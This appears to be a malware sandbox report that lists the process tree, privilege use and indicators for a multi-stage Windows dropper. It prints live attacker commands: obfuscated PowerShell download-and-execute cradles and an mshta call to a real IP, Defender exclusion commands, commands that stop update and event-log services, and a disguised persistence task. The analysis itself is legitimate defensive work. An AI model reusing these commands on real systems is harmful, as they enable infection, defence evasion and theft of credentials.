description pid Process Token: SeDebugPrivilege 1736 powershell.exe Token: SeDebugPrivilege 1516 powershell.exe Token: SeDebugPrivilege 3620 RegSvcs.exe Token: SeDebugPrivilege 4280 powershell.exe Token: SeDebugPrivilege 5788 powershell.exe Token: SeDebugPrivilege 1828 document.exe Token: SeDebugPrivilege 400 powershell.exe Token: SeDebugPrivilege 3608 powershell.exe Token: SeDebugPrivilege 4452 powershell.exe Token: SeIncreaseQuotaPrivilege 3608 powershell.exe Token: SeSecurityPrivilege 3608 powershell.exe Token: SeTakeOwnershipPrivilege 3608 powershell.exe Token: SeLoadDriverPrivilege 3608 powershell.exe Token: SeSystemProfilePrivilege 3608 powershell.exe Token: SeSystemtimePrivilege 3608 powershell.exe Token: SeProfSingleProcessPrivilege 3608 powershell.exe Token: SeIncBasePriorityPrivilege 3608 powershell.exe Token: SeCreatePagefilePrivilege 3608 powershell.exe Token: SeBackupPrivilege 3608 powershell.exe Token: SeRestorePrivilege 3608 powershell.exe Token: SeShutdownPrivilege 3608 powershell.exe Token: SeDebugPrivilege 3608 powershell.exe Token: SeSystemEnvironmentPrivilege 3608 powershell.exe Token: SeRemoteShutdownPrivilege 3608 powershell.exe Token: SeUndockPrivilege 3608 powershell.exe Token: SeManageVolumePrivilege 3608 powershell.exe Token: 33 3608 powershell.exe Token: 34 3608 powershell.exe Token: 35 3608 powershell.exe Token: 36 3608 powershell.exe Token: SeDebugPrivilege 7032 powershell.exe Token: SeDebugPrivilege 7100 powershell.exe Token: SeDebugPrivilege 6148 powershell.exe Token: SeIncreaseQuotaPrivilege 7100 powershell.exe Token: SeSecurityPrivilege 7100 powershell.exe Token: SeTakeOwnershipPrivilege 7100 powershell.exe Token: SeLoadDriverPrivilege 7100 powershell.exe Token: SeSystemProfilePrivilege 7100 powershell.exe Token: SeSystemtimePrivilege 7100 powershell.exe Token: SeProfSingleProcessPrivilege 7100 powershell.exe Token: SeIncBasePriorityPrivilege 7100 powershell.exe Token: SeCreatePagefilePrivilege 7100 powershell.exe Token: SeBackupPrivilege 7100 powershell.exe Token: SeRestorePrivilege 7100 powershell.exe Token: SeShutdownPrivilege 7100 powershell.exe Token: SeDebugPrivilege 7100 powershell.exe Token: SeSystemEnvironmentPrivilege 7100 powershell.exe Token: SeRemoteShutdownPrivilege 7100 powershell.exe Token: SeUndockPrivilege 7100 powershell.exe Token: SeManageVolumePrivilege 7100 powershell.exe Token: 33 7100 powershell.exe Token: 34 7100 powershell.exe Token: 35 7100 powershell.exe Token: 36 7100 powershell.exe Token: SeDebugPrivilege 5912 powershell.exe Token: SeIncreaseQuotaPrivilege 7100 powershell.exe Token: SeSecurityPrivilege 7100 powershell.exe Token: SeTakeOwnershipPrivilege 7100 powershell.exe Token: SeLoadDriverPrivilege 7100 powershell.exe Token: SeSystemProfilePrivilege 7100 powershell.exe Token: SeSystemtimePrivilege 7100 powershell.exe Token: SeProfSingleProcessPrivilege 7100 powershell.exe Token: SeIncBasePriorityPrivilege 7100 powershell.exe Token: SeCreatePagefilePrivilege 7100 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1540 FunnyJellyfish.tmp -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1828 document.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3672 wrote to memory of 2160 3672 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe 83 PID 3672 wrote to memory of 2160 3672 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe 83 PID 3672 wrote to memory of 2160 3672 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe 83 PID 2160 wrote to memory of 1204 2160 skotes.exe 91 PID 2160 wrote to memory of 1204 2160 skotes.exe 91 PID 2160 wrote to memory of 1204 2160 skotes.exe 91 PID 2160 wrote to memory of 380 2160 skotes.exe 95 PID 2160 wrote to memory of 380 2160 skotes.exe 95 PID 380 wrote to memory of 5024 380 file.exe 163 PID 380 wrote to memory of 5024 380 file.exe 163 PID 5024 wrote to memory of 1516 5024 wscript.exe 97 PID 5024 wrote to memory of 1516 5024 wscript.exe 97 PID 5024 wrote to memory of 1736 5024 wscript.exe 98 PID 5024 wrote to memory of 1736 5024 wscript.exe 98 PID 1516 wrote to memory of 4372 1516 powershell.exe 148 PID 1516 wrote to memory of 4372 1516 powershell.exe 148 PID 4372 wrote to memory of 1944 4372 WScript.exe 105 PID 4372 wrote to memory of 1944 4372 WScript.exe 105 PID 1944 wrote to memory of 4312 1944 cmd.exe 107 PID 1944 wrote to memory of 4312 1944 cmd.exe 107 PID 1736 wrote to memory of 348 1736 powershell.exe 108 PID 1736 wrote to memory of 348 1736 powershell.exe 108 PID 1736 wrote to memory of 3620 1736 powershell.exe 109 PID 1736 wrote to memory of 3620 1736 powershell.exe 109 PID 1736 wrote to memory of 3620 1736 powershell.exe 109 PID 1736 wrote to memory of 3620 1736 powershell.exe 109 PID 1736 wrote to memory of 3620 1736 powershell.exe 109 PID 1736 wrote to memory of 3620 1736 powershell.exe 109 PID 1736 wrote to memory of 3620 1736 powershell.exe 109 PID 1736 wrote to memory of 3620 1736 powershell.exe 109 PID 4312 wrote to memory of 4280 4312 mshta.exe 110 PID 4312 wrote to memory of 4280 4312 mshta.exe 110 PID 2160 wrote to memory of 948 2160 skotes.exe 112 PID 2160 wrote to memory of 948 2160 skotes.exe 112 PID 2160 wrote to memory of 948 2160 skotes.exe 112 PID 948 wrote to memory of 5304 948 FunnyJellyfish.exe 213 PID 948 wrote to memory of 5304 948 FunnyJellyfish.exe 213 PID 948 wrote to memory of 5304 948 FunnyJellyfish.exe 213 PID 5304 wrote to memory of 5548 5304 FunnyJellyfish.tmp 114 PID 5304 wrote to memory of 5548 5304 FunnyJellyfish.tmp 114 PID 5304 wrote to memory of 5548 5304 FunnyJellyfish.tmp 114 PID 4280 wrote to memory of 5788 4280 powershell.exe 116 PID 4280 wrote to memory of 5788 4280 powershell.exe 116 PID 5548 wrote to memory of 1352 5548 cmd.exe 117 PID 5548 wrote to memory of 1352 5548 cmd.exe 117 PID 5548 wrote to memory of 1352 5548 cmd.exe 117 PID 2160 wrote to memory of 1828 2160 skotes.exe 118 PID 2160 wrote to memory of 1828 2160 skotes.exe 118 PID 5548 wrote to memory of 5720 5548 cmd.exe 119 PID 5548 wrote to memory of 5720 5548 cmd.exe 119 PID 5548 wrote to memory of 5720 5548 cmd.exe 119 PID 5720 wrote to memory of 1540 5720 FunnyJellyfish.exe 120 PID 5720 wrote to memory of 1540 5720 FunnyJellyfish.exe 120 PID 5720 wrote to memory of 1540 5720 FunnyJellyfish.exe 120 PID 1540 wrote to memory of 1960 1540 FunnyJellyfish.tmp 121 PID 1540 wrote to memory of 1960 1540 FunnyJellyfish.tmp 121 PID 1540 wrote to memory of 1960 1540 FunnyJellyfish.tmp 121 PID 1828 wrote to memory of 400 1828 document.exe 122 PID 1828 wrote to memory of 400 1828 document.exe 122 PID 2160 wrote to memory of 6188 2160 skotes.exe 124 PID 2160 wrote to memory of 6188 2160 skotes.exe 124 PID 2160 wrote to memory of 6188 2160 skotes.exe 124 PID 1960 wrote to memory of 6256 1960 regsvr32.exe 125 PID 1960 wrote to memory of 6256 1960 regsvr32.exe 125 -
outlook_office_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:64
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:392
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1092
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2820
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵PID:2548
-
-
C:\Windows\system32\regsvr32.EXEC:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll2⤵PID:5048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"3⤵
- Command and Scripting Interpreter: PowerShell
PID:1508
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵PID:1620
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe2⤵PID:5596
-
-
C:\Windows\system32\regsvr32.EXEC:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll2⤵PID:5904
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"3⤵
- Command and Scripting Interpreter: PowerShell
PID:5512
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1152
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1192
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1372
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2628
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1564
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1652
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1680
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1800
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1924
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2020
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:1756
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2144
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2264
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2788
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2832
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2844
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2864
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3320
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3440
-
C:\Users\Admin\AppData\Local\Temp\5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe"C:\Users\Admin\AppData\Local\Temp\5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1204
-
-
C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\SYSTEM32\wscript.exe"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"7⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update8⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:1932
-
-
C:\Windows\system32\mshta.exemshta http://176.113.115.178/Windows-Update9⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X10⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5788
-
-
C:\Users\Admin\AppData\Roaming\LB31.exe"C:\Users\Admin\AppData\Roaming\LB31.exe"11⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:6476 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5912
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart12⤵PID:5664
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart13⤵PID:6132
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc12⤵
- Launches sc.exe
PID:2360
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc12⤵
- Launches sc.exe
PID:5840
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv12⤵
- Launches sc.exe
PID:644 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵PID:4372
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits12⤵
- Launches sc.exe
PID:2276
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc12⤵
- Launches sc.exe
PID:448
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 012⤵
- Power Settings
PID:6448
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 012⤵
- Power Settings
PID:5088
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 012⤵
- Power Settings
PID:6136
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 012⤵
- Power Settings
PID:4728
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe12⤵PID:5668
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "LIB"12⤵
- Launches sc.exe
PID:4420 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵PID:5024
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"12⤵
- Launches sc.exe
PID:7004
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog12⤵
- Launches sc.exe
PID:5600
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "LIB"12⤵
- Launches sc.exe
PID:2308 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵PID:3872
-
-
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns7⤵
- Gathers network information
PID:348
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3620
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Users\Admin\AppData\Local\Temp\is-MODQN.tmp\FunnyJellyfish.tmp"C:\Users\Admin\AppData\Local\Temp\is-MODQN.tmp\FunnyJellyfish.tmp" /SL5="$D0040,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5304 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C timeout /T 3 & "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5548 -
C:\Windows\SysWOW64\timeout.exetimeout /T 37⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1352
-
-
C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5720 -
C:\Users\Admin\AppData\Local\Temp\is-QNFF2.tmp\FunnyJellyfish.tmp"C:\Users\Admin\AppData\Local\Temp\is-QNFF2.tmp\FunnyJellyfish.tmp" /SL5="$A003E,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"9⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\system32\regsvr32.exe/s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"10⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:6256 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{62A2717E-2A74-4715-8546-402ECE465006}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7100
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe"C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'document.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\svchost.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6148
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008081001\a381714d22.exe"C:\Users\Admin\AppData\Local\Temp\1008081001\a381714d22.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6188 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"5⤵
- Uses browser remote debugging
PID:208 -
